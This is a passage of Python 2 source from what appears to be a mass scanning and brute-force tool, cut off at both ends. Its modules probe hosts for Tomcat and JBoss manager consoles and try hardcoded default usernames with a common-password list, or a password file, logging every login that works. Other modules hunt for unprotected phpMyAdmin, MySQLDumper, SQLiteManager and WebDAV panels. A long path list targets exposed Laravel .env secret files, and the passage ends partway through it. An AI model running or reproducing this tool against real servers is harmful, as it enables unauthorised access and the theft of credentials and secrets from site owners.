tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "root", "admin")[0] == True: result_line += " Account: root / admin" print "[*] JMX (BRUTED):",target_url, "Login: root:admin" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "root", "root")[0] == True: result_line += " Account: root / root" print "[*] JMX (BRUTED):",target_url, "Login: root:root" tools().logging(__info__['log_bruted_result_file'], result_line) else: print "[*] JMX (SEC):",target_url tools().logging(__info__['log_sec_result_file'], result_line) elif any(k in target_return[3] for k in __info__['mark_usec']): print "[*] JMX (USEC):",target_url tools().logging(__info__['log_usec_result_file'], result_line) else: print "[*] JMX (UKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], result_line) elif target_return[1] != 404: #Needs Login but can be bruted print "[*] JMX (UNKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_jmx2(self, ip, port): ############################################################# # Scan for Jboss/Tomcat servers having a admin panel and update:29.01.21 # brute for accounts and log them Ports to scan: (8081,8080,8090,8443,3541,8086,9080,) # Brute modded by moep ############################################################# __info__ = {"name" : "jmx", "log_sec_result_file" : "log_jmx2_secured.txt", "log_usec_result_file" : "log_jmx2_unsecured.txt", "log_unknwn_result_file" : "unknwn_results_jmx2.txt", "log_bruted_result_file" : "log_jmx2_bruted.txt", "paths" : ["/jmx-console", "/admin-console/", "/EJBInvokerServlet", "/web-console/AOPBinding.jsp", "/web-console/Invoker", "/jadmin-console/", "/web-console/status", "/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo" "/admin-console/", "/ROOT", "/add", "/balancer", "/dav", "/deploy", "/examples", "/examples/jsp/index.html", 
"/examples/jsp/snp/snoop.jsp", "/examples/jsp/source.jsp", "/examples/servlet/HelloWorldExample", "/examples/servlet/SnoopServlet", "/examples/servlet/TroubleShooter", "/examples/servlet/default/jsp/snp/snoop.jsp", "/examples/servlet/default/jsp/source.jsp", "/examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample", "/examples/servlet/org.apache.catalina.INVOKER.SnoopServlet", "/examples/servlet/org.apache.catalina.INVOKER.TroubleShooter", "/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp", "/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp", "/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp", "/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp", "/examples/servlet/snoop", "/examples/servlets/index.html", "/examples/../manager/html", "/examples/%2e%2e/manager/html", "/examples/%252e%252e/manager/html", "/host-manager", "/host-manager/add", "/host-manager/host-manager.xml", "/host-manager/html/*", "/host-manager/list", "/host-manager/remove", "/host-manager/start", "/host-manager/stop", "/html/*", "/install", "/j4p", "/jmxproxy/*", "/jsp-examples", "/manager/list", "/manager/manager.xml", "/manager/reload", "/manager/remove", "/manager/resources", "/manager/roles", "/manager/save", "/manager/serverinfo", "/manager/sessions", "/manager/start", "/manager/status.xsd", "/manager/status/*", "/manager/stop", "/manager/undeploy", "/reload", "/remove", "/resources", "/roles", "/save", "/serverinfo", "/servlet/default/", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/", "/servlet/org.apache.catalina.servlets.DefaultServlet/", "/servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif", 
"/servlet/org.apache.catalina.servlets.HTMLManagerServlet", "/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.servlets.ManagerServlet", "/servlet/org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.servlets.WebdavServlet/", "/servlets-examples", "/sessions", "/start", "/status/*", "/stop", "/tomcat-docs", "/undeploy", "/webdav", "/webdav/index.html", "/webdav/servlet/org.apache.catalina.servlets.WebdavServlet/", "/webdav/servlet/webdav/", "/invoker/JMXInvokerServlet" "/web-console/ServerInfo.jsp" "/invoker/", "/JMXInvokerServlet", "/jbossmq-httpil/", "/jbossws/services", "/jmx-console/HtmlAdaptor", "/web-console", "/manager/html", "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo"], "mark_sec" : ["main Manager page", "&lt;role rolename=\"manager-gui\"/&gt;", "Manager App HOW-TO"], "mark_usec" : ["JBoss JMX Management Console", "x-powered-by jboss", "jboss http.favicon.hash:-656811182"]} tadmins = ['admin', 'both', 'manager', 'role', 'role1' 'root', 'tomcat', 't0mcat'] tpasswords = ['', '102030', '112233', '123', '123123', '1234', '12345', '123456', '1234567', '12345678', '123456789', '1234567890', '1q2w3e4r', '321321', '654321', '666666', 'Password', 'Password1', 'Password12', 'Password123', 'abc123', 'access', 'admin', 'admin01','admin123', 'admin1234', 'admin123456', '[email protected]', 'adminadmin', 'blah', 'both', 'changethis', 'demo', 'demo123', 'hello', 'manager', 'pass', 'pass123', 'pass1234', 'passw0rd', 'password', 'password1', 'password12', 'password123', 'qwert', 'qwerty', 'qwertz', 'qwerty123', 'role', 'root', 's3cret', 'secret', 't0mcat', 'test', 'tomcat', 'toor', 'welcome', 'xmagico', 'zx321654xz'] main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in 
__info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[1] if target_return[0] == False: print "Host down" break if target_return[1] == 404: continue #Skip 404 Things target_server_info = tools().get_http_headers(main_url) headers = tools().get_http_headers(main_url) try: headers_server = headers['Server'] except KeyError: headers_server = "Unknown" result_line = "%s Server: %s" %(target_url, headers_server) if target_return[1] == 200 or target_return[1] == 401: #Might be unsecured if any(k in target_return[3] for k in __info__['mark_sec']): for tadmin in tadmins: for tpwd in tpasswords: tpwdx = tpwd.strip() if tools().http_basic_auth(target_url, tadmin, tpwdx)[0] == True: result_line += " Account:" + tadmin + "/" + tpwdx print "[*] JMX (BRUTED):" + target_url + " Login:" + tadmin + ":" + tpwdx tools().logging(__info__['log_bruted_result_file'], result_line) break else: print "[*] JMX Wrong Pass:" + target_url + " Login:" + tadmin + ":" + tpwdx else: print "[*] JMX (SEC):",target_url tools().logging(__info__['log_sec_result_file'], result_line) elif any(k in target_return[3] for k in __info__['mark_usec']): print "[*] JMX (USEC):",target_url tools().logging(__info__['log_usec_result_file'], result_line) else: print "[*] JMX (UKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], result_line) elif target_return[1] != 404: #Needs Login but can be bruted print "[*] JMX (UNKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_jmx3(self, ip, port): ############################################################# # Scan for Jboss/Tomcat servers having a admin panel and update:29.01.21 # brute for accounts and log them Ports to scan: (8081,8080,8090,8443,3541,8086,9080,) # Brute modded by moep ############################################################# __info__ = {"name" : "jmx", "log_sec_result_file" : "log_jmx3_secured.txt", 
"log_usec_result_file" : "log_jmx3_unsecured.txt", "log_unknwn_result_file" : "unknwn_results_jmx3.txt", "log_bruted_result_file" : "log_jmx3_bruted.txt", "paths" : ["/jmx-console", "/admin-console/", "/EJBInvokerServlet", "/web-console/AOPBinding.jsp", "/web-console/Invoker", "/jadmin-console/", "/web-console/status", "/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo" "/admin-console/", "/ROOT", "/add", "/balancer", "/dav", "/deploy", "/examples", "/examples/jsp/index.html", "/examples/jsp/snp/snoop.jsp", "/examples/jsp/source.jsp", "/examples/servlet/HelloWorldExample", "/examples/servlet/SnoopServlet", "/examples/servlet/TroubleShooter", "/examples/servlet/default/jsp/snp/snoop.jsp", "/examples/servlet/default/jsp/source.jsp", "/examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample", "/examples/servlet/org.apache.catalina.INVOKER.SnoopServlet", "/examples/servlet/org.apache.catalina.INVOKER.TroubleShooter", "/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp", "/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp", "/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp", "/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp", "/examples/servlet/snoop", "/examples/servlets/index.html", "/examples/../manager/html", "/examples/%2e%2e/manager/html", "/examples/%252e%252e/manager/html", "/host-manager", "/host-manager/add", "/host-manager/host-manager.xml", "/host-manager/html/*", "/host-manager/list", "/host-manager/remove", "/host-manager/start", "/host-manager/stop", "/html/*", "/install", "/j4p", "/jmxproxy/*", "/jsp-examples", "/manager/list", "/manager/manager.xml", "/manager/reload", "/manager/remove", "/manager/resources", "/manager/roles", "/manager/save", "/manager/serverinfo", "/manager/sessions", "/manager/start", "/manager/status.xsd", "/manager/status/*", "/manager/stop", "/manager/undeploy", "/reload", "/remove", "/resources", 
"/roles", "/save", "/serverinfo", "/servlet/default/", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/", "/servlet/org.apache.catalina.servlets.DefaultServlet/", "/servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.servlets.HTMLManagerServlet", "/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.servlets.ManagerServlet", "/servlet/org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.servlets.WebdavServlet/", "/servlets-examples", "/sessions", "/start", "/status/*", "/stop", "/tomcat-docs", "/undeploy", "/webdav", "/webdav/index.html", "/webdav/servlet/org.apache.catalina.servlets.WebdavServlet/", "/webdav/servlet/webdav/", "/invoker/JMXInvokerServlet" "/web-console/ServerInfo.jsp" "/invoker/", "/JMXInvokerServlet", "/jbossmq-httpil/", "/jbossws/services", "/jmx-console/HtmlAdaptor", "/web-console", "/manager/html", "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo"], "mark_sec" : ["main Manager page", "&lt;role rolename=\"manager-gui\"/&gt;", "Manager App HOW-TO"], "mark_usec" : ["JBoss JMX Management Console", "x-powered-by jboss", "jboss http.favicon.hash:-656811182"]} tadmins = ['admin', 'both', 'manager', 'role', 'role1' 'root', 'tomcat', 't0mcat'] tpasswords = open('passwords_unix.txt', 'r').read().splitlines() main_url = tools().create_http_url(ip, port, file = "", prot = "http") for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[1] if target_return[0] == False: print "Host 
down" break if target_return[1] == 404: continue #Skip 404 Things target_server_info = tools().get_http_headers(main_url) headers = tools().get_http_headers(main_url) try: headers_server = headers['Server'] except KeyError: headers_server = "Unknown" result_line = "%s Server: %s" %(target_url, headers_server) if target_return[1] == 200 or target_return[1] == 401: #Might be unsecured if any(k in target_return[3] for k in __info__['mark_sec']): for tadmin in tadmins: for tpwd in tpasswords: if tools().http_basic_auth(target_url, tadmin, tpwd)[0] == True: result_line += " Account:" + tadmin + "/" + tpwd print "[*] JMX (BRUTED):" + target_url + " Login:" + tadmin + ":" + tpwd tools().logging(__info__['log_bruted_result_file'], result_line) break else: print "[*] JMX Wrong Pass:" + target_url + " Login:" + tadmin + ":" + tpwd else: print "[*] JMX (SEC):",target_url tools().logging(__info__['log_sec_result_file'], result_line) elif any(k in target_return[3] for k in __info__['mark_usec']): print "[*] JMX (USEC):",target_url tools().logging(__info__['log_usec_result_file'], result_line) else: print "[*] JMX (UKNWN):",target_url tools().logging(__info__['log_unknw_result_file'], result_line) elif target_return[1] != 404: #Needs Login but can be bruted print "[*] JMX (UNKNWN):",target_url tools().logging(__info__['log_unknw_result_file'], result_line) def module_scan_mysqldumper(self, ip, port): ############################################################# # Scan Hosts for installed MySQLDumper and log them ############################################################# __info__ = {"name" : "mysqldumper", "log_usec_result_file" : "usec_result_msd.txt", "log_sec_result_file" : "sec_results_msd.txt", "log_unknwn_result_file" : "unknwn_results_msd.txt", "paths" : ["/Dumper", "/MSD", "/MySQL", "/MySQLDumper", "/dumper", "/msd", "/msd1.24.4", "/msd1.24stable", "/mySQLDumper", "/mySQLmanager", "/mySqlDumper", "/mysql", "/mysqldumper", "/sql", "/sqladmin", "/sqlmanager", "/sqlweb", 
"/websql"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) if target_return[0] == False: print "Host down" break if target_return[1] == 200: #Might be unsecured if target_return[3].find("<title>MySQLDumper</title>") != -1: print "[*] MSD (USEC):",target_url tools().logging(__info__['log_usec_result_file'], target_url) else: tools().logging(__info__['log_unknwn_result_file'], target_url) elif target_return[1] == 203: #Might be protected with htaccess print "[*] MSD (SEC):",target_url tools().logging(__info__['log_sec_result_file'], target_url) def module_scan_phpmyadmin(self, ip, port): ############################################################# # Scan Hosts for phpmyadmin and log them ############################################################# __info__ = {"name" : "phpmyadmin", "log_usec_result_file" : "usec_result_pma.txt", "log_sec_result_file" : "sec_results_pma.txt", "log_unknwn_result_file" : "unknwn_results_pma.txt", "paths" : ["/phpmyadmin", "/phpMyAdmin", "/mysql", "/sql", "/myadmin", "/phpMyAdmin-4.2.1-all-languages", "/phpMyAdmin-4.2.1-english", "/xampp/phpmyadmin", "/typo3/phpmyadmin", "/webadmin"], "mark_usec" : ["<li id=\"li_server_info\">Server: ", "src=\"navigation.php", "src=\"main.php"], "mark_sec" : ["www.phpmyadmin.net", "input_username", "pma_username", "pma_password", "src=\"main.php?token="], "mark_blacklist" : ["<?php", "<?"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) if target_return[0] == False: print "Host down" break if target_return[1] == 200: #Might be unsecured #print target_return[3] # Check with k not in ... 
mark_fuzzed that the pma is not fucked up ;) if any(k in target_return[3] for k in __info__['mark_usec']) and any(k not in target_return[3] for k in __info__['mark_blacklist']): print "[*] PMA (USEC):",target_url tools().logging(__info__['log_usec_result_file'], target_url) elif any(k in target_return[3] for k in __info__['mark_sec']) and any(k not in target_return[3] for k in __info__['mark_blacklist']): print "[*] PMA (SEC):",target_url tools().logging(__info__['log_sec_result_file'], target_url) else: print "[*] PMA (UKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], target_url) elif target_return[1] == 203: #Might be protected with htaccess print "[*] PMA (SEC):",target_url tools().logging(__info__['log_sec_result_file'], target_url) def module_scan_sqlitemanager(self, ip, port): ############################################################# # Scan for sqlitemanager and log them ############################################################# __info__ = {"name" : "sqlitemanager", "log_result_file" : "log_sqlitemanager.txt", "log_unknwn_result_file" : "unknwn_results_sqlitemanager.txt", "paths" : ["/sqlite", "/SQLite/SQLiteManager-1.2.4", "/SQLiteManager-1.2.4", "/sqlitemanager", "/SQlite", "/SQLiteManager"], "marks" : ["Create or add new database", "<h2 class=\"sqlmVersion\">Welcome to", "http://www.sqlitemanager.org"],} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path+"/main.php" target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[1] == 200: result_line = "%s Server: %s" %(target_url, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): sys.stdout.write("[*] Sqlitemanager: %s\n" %target_url) tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], 
result_line) def module_scan_webdav(self, ip, port): ############################################################# # Scan for webdav and log them ############################################################# __info__ = {"name" : "webdav", "log_result_file" : "log_webdav.txt", "log_unknwn_result_file" : "unknwn_results_webdav.txt", "paths" : ["/webdav"], "mark_xampp" : ["<b>WebDAV testpage</b>"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[1] if target_return[0] == False: print "Host down" break if target_return[1] == 404: continue #Skip 404 Things target_server_info = tools().get_http_headers(main_url) headers = tools().get_http_headers(main_url) try: headers_server = headers['Server'] except KeyError: headers_server = "Unknown" result_line = "%s Server: %s" %(target_url, headers_server) if target_return[1] == 200 or target_return[1] == 401: if any(k in target_return[3] for k in __info__['mark_xampp']): print "[*] WebDAV (TRUE):", target_url tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], result_line) elif target_return[1] != 404: #Needs Login but can be bruted print "[*] WebDAV (UNKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_laravel(self, ip, port): ############################################################# #Scan for laravel by [email protected]@R-LightS ############################################################# __info__ = {"name" : "laravel", "log_result_file" : "log_laravel.txt", "log_unknwn_result_file" : "unknwn_results_laravel.txt", "paths" : [ "/.env", "/__tests__/test-become/.env", "/_static/.env", "/.c9/metadata/environment/.env", "/.docker/.env", "/.docker/laravel/app/.env", "/.env.backup", "/.env.dev", "/.env.development.local", 
"/.env.docker.dev", "/.env.example", "/.env.local", "/.env.php", "/.env.prod", "/.env.production.local", "/.env.sample.php", "/.env.save", "/.env.stage", "/.env.test", "/.env.test.local", "/.env~", "/.gitlab-ci/.env", "/.vscode/.env", "/3-sequelize/final/.env", "/07-accessing-data/begin/vue-heroes/.env", "/07-accessing-data/end/vue-heroes/.env", "/08-routing/begin/vue-heroes/.env", "/08-routing/end/vue-heroes/.env", "/09-managing-state/begin/vue-heroes/.env", "/09-managing-state/end/vue-heroes/.env", "/31_structure_tests/.env", "/acme_challenges/.env", "/acme-challenge/.env", "/acme/.env", "/actions-server/.env", "/admin-app/.env", "/admin/.env", "/adminer/.env", "/administrator/.env", "/agora/.env", "/alpha/.env", "/anaconda/.env", "/api/.env", "/api/src/.env", "/app_dir/.env", "/app_nginx_static_path/.env", "/app-order-client/.env", "/app/.env", "/app/client/.env", "/app/code/community/Nosto/Tagging/.env", "/app/config/.env", "/app/config/dev/.env", "/app/frontend/.env", "/app1-static/.env", "/app2-static/.env", "/apps/.env", "/apps/client/.env", "/Archipel/.env", "/asset_img/.env", "/assets/.env", "/Assignment3/.env", "/Assignment4/.env", "/audio/.env", "/awstats/.env", "/babel-plugin-dotenv/test/fixtures/as-alias/.env", "/babel-plugin-dotenv/test/fixtures/default/.env", "/babel-plugin-dotenv/test/fixtures/dev-env/.env", "/babel-plugin-dotenv/test/fixtures/empty-values/.env", "/babel-plugin-dotenv/test/fixtures/filename/.env", "/babel-plugin-dotenv/test/fixtures/override-value/.env", "/babel-plugin-dotenv/test/fixtures/prod-env/.env", "/back-end/app/.env", "/back/.env", "/backend/.env", "/backend/src/.env", "/backendfinaltest/.env", "/backup/.env", "/base_dir/.env", "/basic-network/.env", "/bgoldd/.env", "/bitcoind/.env", "/blankon/.env", "/blob/.env", "/blog/.env", "/blue/.env", "/bookchain-client/.env", "/bootstrap/.env", "/boxes/oracle-vagrant-boxes/ContainerRegistry/.env", "/boxes/oracle-vagrant-boxes/Kubernetes/.env", 
"/boxes/oracle-vagrant-boxes/OLCNE/.env", "/bucoffea/.env", "/build/.env", "/cardea/backend/.env", "/cdw-backend/.env", "/cgi-bin/.env", "/ch2-mytodo/.env", "/ch6-mytodo/.env", "/ch6a-mytodo/.env", "/ch7-mytodo/.env", "/ch7a-mytodo/.env", "/ch8-mytodo/.env", "/ch8a-mytodo/.env", "/ch8b-mytodo/.env", "/Chai/.env", "/challenge/.env", "/challenges/.env", "/charts/liveObjects/.env", "/chat-client/.env", "/chiminey/.env", "/client-app/.env", "/client/.env", "/client/mutual-fund-app/.env", "/client/src/.env", "/ClientApp/.env", "/clld_dir/.env", "/cmd/testdata/expected/dot_env/.env", "/code/api/.env", "/code/web/.env", "/CodeGolf.Web/ClientApp/.env", "/codenames-frontend/.env", "/collab-connect-web-application/server/.env", "/collected_static/.env", "/community/.env", "/conf/.env", "/config/.env", "/ContainerRegistry/.env", "/content/.env", "/core/.env", "/core/app/.env", "/core/Datavase/.env", "/core/persistence/.env", "/core/src/main/resources/org/jobrunr/dashboard/frontend/.env", "/counterblockd/.env", "/counterwallet/.env", "/cp/.env", "/cron/.env", "/cronlab/.env", "/cryo_project/.env", "/css/.env", "/custom/.env", "/d/.env", "/data/.env", "/database/.env", "/dataset1/.env", "/dataset2/.env", "/default/.env", "/delivery/.env", "/demo-app/.env", "/demo/.env", "/deploy/.env", "/developerslv/.env", "/development/.env", "/directories/.env", "/dist/.env", "/django_project_path/.env", "/django-blog/.env", "/django/.env", "/doc/.env", "/docker-compose/platform/.env", "/docker-elk/.env", "/docker-network-healthcheck/.env", "/docker-node-mongo-redis/.env", "/docker/.env", "/docker/app/.env", "/docker/compose/withMongo/.env", "/docker/compose/withPostgres/.env", "/docker/database/.env", "/docker/db/.env", "/docker/examples/compose/.env", "/docker/postgres/.env", "/docker/webdav/.env", "/docs/.env", "/dodoswap-client/.env", "/dotfiles/.env", "/download/.env", "/downloads/.env", "/e2e/.env", "/en/.env", "/engine/.env", "/env/.env", "/env/dockers/mariadb-test/.env", 
"/env/dockers/php-apache/.env", "/env/example/.env", "/env/template/.env", "/environments/local/.env", "/environments/production/.env", "/error/.env", "/errors/.env", "/example/.env", "/example02-golang-package/import-underscore/.env", "/example27-how-to-load-env/sample01/.env", "/example27-how-to-load-env/sample02/.env", "/examples/.env", "/examples/01-simple-model/.env", "/examples/02-complex-example/.env", "/examples/03-one-to-many-relationship/.env", "/examples/04-many-to-many-relationship/.env", "/examples/05-migrations/.env", "/examples/06-base-service/.env", "/examples/07-feature-flags/.env", "/examples/08-performance/.env", "/examples/09-production/.env", "/examples/10-subscriptions/.env", "/examples/11-transactions/.env", "/examples/drupal-separate-services/.env", "/examples/react-dashboard/backend/.env", "/examples/sdl-first/.env", "/examples/sdl-first/prisma/.env", "/examples/vue-dashboard/backend/.env", "/examples/web/.env", "/examples/with-cookie-auth-fauna/.env", "/examples/with-dotenv/.env", "/examples/with-firebase-authentication-serverless/.env", "/examples/with-react-relay-network-modern/.env", "/examples/with-relay-modern/.env", "/examples/with-universal-configuration-build-time/.env", "/exapi/.env", "/Exercise.Frontend/.env", "/Exercise.Frontend/train/.env", "/export/.env", "/fastlane/.env", "/favicons/.env", "/favs/.env", "/FE/huey/.env", "/fedex/.env", "/fhir-api/.env", "/files/.env", "/fileserver/.env", "/films/.env", "/Final_Project/Airflow_Dag/.env", "/Final_Project/kafka_twitter/.env", "/Final_Project/StartingFile/.env", "/finalVersion/lcomernbootcamp/projbackend/.env", "/FIRST_CONFIG/.env", "/first-network/.env", "/fisdom/fisdom/.env", "/fixtures/blocks/.env", "/fixtures/fiber-debugger/.env", "/fixtures/flight/.env", "/fixtures/kitchensink/.env", "/flask_test_uploads/.env", "/fm/.env", "/font-icons/.env", "/fonts/.env", "/front-app/.env", "/front-empathy/.env", "/front-end/.env", "/front/.env", "/front/src/.env", "/frontend/.env", 
"/frontend/momentum-fe/.env", "/frontend/react/.env", "/frontend/vue/.env", "/frontendfinaltest/.env", "/ftp/.env", "/ftpmaster/.env", "/gists/cache", "/gists/laravel", "/gists/pusher", "/github-connect/.env", "/grems-api/.env", "/grems-frontend/.env", "/Hash/.env", "/hasura/.env", "/Helmetjs/.env", "/hgs-static/.env", "/higlass-website/.env", "/home/.env", "/horde/.env", "/hotpot-app-frontend/.env", "/htdocs/.env", "/html/.env", "/http/.env", "/httpboot/.env", "/HUNIV_migration/.env", "/icon/.env", "/icons/.env", "/ikiwiki/.env", "/image_data/.env", "/Imagebord/.env", "/images/.env", "/img/.env", "/install/.env", "/InstantCV/server/.env", "/items/.env", "/javascript/.env", "/js-plugin/.env", "/js/.env", "/jsrelay/.env", "/jupyter/.env", "/khanlinks/.env", "/kibana/.env", "/kodenames-server/.env", "/kolab-syncroton/.env", "/Kubernetes/.env", "/lab/.env", "/laravel/.env", "/latest/.env", "/layout/.env", "/lcomernbootcamp/projbackend/.env", "/leafer-app/.env", "/ledger_sync/.env", "/legacy/tests/9.1.1", "/legacy/tests/9.2.0", "/legal/.env", "/lemonldap-ng-doc/.env", "/lemonldap-ng-fr-doc/.env", "/letsencrypt/.env", "/lib/.env", "/Library/.env", "/libs/.env", "/linux/.env", "/local/.env", "/log/.env", "/logging/.env", "/login/.env", "/mail/.env", "/mailinabox/.env", "/mailman/.env", "/main_user/.env", "/main/.env", "/manual/.env", "/master/.env", "/media/.env", "/memcached/.env", "/mentorg-lava-docker/.env", "/micro-app-react-communication/.env", "/micro-app-react/.env", "/mindsweeper/gui/.env", "/minified/.env", "/misc/.env", "/Modix/ClientApp/.env", "/monerod/.env", "/mongodb/config/dev/.env", "/monitoring/compose/.env", "/moodledata/.env", "/msks/.env", "/munki_repo/.env", "/music/.env", "/MyRentals.Web/ClientApp/.env", "/name/.env", "/new-js/.env", "/news-app/.env", "/nginx-server/.env", "/nginx/.env", "/niffler-frontend/.env", "/node_modules/.env", "/Nodejs-Projects/play-ground/login/.env", "/Nodejs-Projects/play-ground/ManageUserRoles/.env", "/noVNC/.env", 
"/Nuke.App.Ui/.env", "/oldsanta/.env", "/ops/vagrant/.env", "/option/.env", "/orientdb-client/.env", "/outputs/.env", "/owncloud/.env", "/packages/api/.env", "/packages/app/.env", "/packages/client/.env", "/packages/frontend/.env", "/packages/plugin-analytics/src/fixtures/analytics-ga-key/.env", "/packages/plugin-qiankun/examples/app1/.env", "/packages/plugin-qiankun/examples/app2/.env", "/packages/plugin-qiankun/examples/app3/.env", "/packages/plugin-qiankun/examples/master/.env", "/packages/react-scripts/fixtures/kitchensink/template/.env", "/packages/styled-ui-docs/.env", "/packages/web/.env", "/packed/.env", "/page-editor/.env", "/parity/.env", "/Passportjs/.env", "/patchwork/.env", "/path/.env", "/pfbe/.env", "/pictures/.env", "/playground/.env", "/plugin_static/.env", "/post-deployment/.vscode/.env", "/postfixadmin/.env", "/price_hawk_client/.env", "/prisma/.env", "/private/.env", "/processor/.env", "/prod/.env", "/projbackend/.env", "/project_root/.env", "/psnlink/.env", "/pt2/countries/src/.env", "/pt8/library-backend-gql/.env", "/pub/.env", "/public_html/.env", "/public_root/.env", "/public/.env", "/question2/.env", "/qv-frontend/.env", "/rabbitmq-cluster/.env", "/rails-api/react-app/.env", "/rasax/.env", "/react_todo/.env", "/redmine/.env", "/repo/.env", "/repos/.env", "/repository/.env", "/resources/.env", "/resources/docker/.env", "/resources/docker/mysql/.env", "/resources/docker/phpmyadmin/.env", "/resources/docker/rabbitmq/.env", "/resources/docker/rediscommander/.env", "/resourcesync/.env", "/rest/.env", "/restapi/.env", "/results/.env", "/robots/.env", "/root/.env", "/rosterBack/.env", "/roundcube/.env", "/roundcubemail/.env", "/routes/.env", "/run/.env", "/rust-backend/.env", "/rust-backend/dao/.env", "/s-with-me-front/.env", "/saas/.env", "/samples/chatroom/chatroom-spa/.env", "/samples/docker/deploymentscripts/.env", "/script/.env", "/scripts/.env", "/scripts/fvt/.env", "/selfish-darling-backend/.env", "/Serve_time_server/.env", 
"/serve-browserbench/.env", "/Server_with_db/.env", "/server/.env", "/server/config/.env", "/server/laravel/.env", "/server/src/persistence/.env", "/services/adminer/.env", "/services/deployment-agent/.env", "/services/documents/.env", "/services/graylog/.env", "/services/jaeger/.env", "/services/minio/.env", "/services/monitoring/.env", "/services/portainer/.env", "/services/redis-commander/.env", "/services/registry/.env", "/services/simcore/.env", "/services/traefik/.env", "/sessions/.env", "/shared/.env", "/shibboleth/.env", "/shop/.env", "/Simple_server/.env", "/site-library/.env", "/site/.env", "/sitemaps/.env", "/sites/.env", "/sitestatic/.env", "/Socketio/.env", "/sources/.env", "/Sources/API/.env", "/spearmint/.env", "/spikes/config-material-app/.env", "/SpotiApps/.env", "/src/__tests__/__fixtures__/instanceWithDependentSteps/.env", "/src/__tests__/__fixtures__/typeScriptIntegrationProject/.env", "/src/__tests__/__fixtures__/typeScriptProject/.env", "/src/__tests__/__fixtures__/typeScriptVisualizeProject/.env", "/src/.env", "/src/add-auth/express/.env", "/src/assembly/.env", "/src/character-service/.env", "/src/client/mobile/.env", "/src/core/tests/dotenv-files/.env", "/src/gameprovider-service/.env", "/src/main/front-end/.env", "/src/main/resources/archetype-resources/__rootArtifactId__-acceptance-test/src/test/resources/app-launcher-tile/.env", "/src/renderer/.env", "/srv6_controller/controller/.env", "/srv6_controller/examples/.env", "/srv6_controller/node-manager/.env", "/st-js-be-2020-movies-two/.env", "/stackato-pkg/.env", "/static_prod/.env", "/static_root/.env", "/static_user/.env", "/static-collected/.env", "/static-html/.env", "/static-root/.env", "/static/.env", "/staticfiles/.env", "/stats/.env", "/storage/.env", "/style/.env", "/styles/.env", "/stylesheets/.env", "/symfony/.env", "/system-config/.env", "/system/.env", "/target/.env", "/temanr9/.env", "/temanr10/.env", "/temp/.env", "/template/.env", "/templates/.env", "/test-network/.env", 
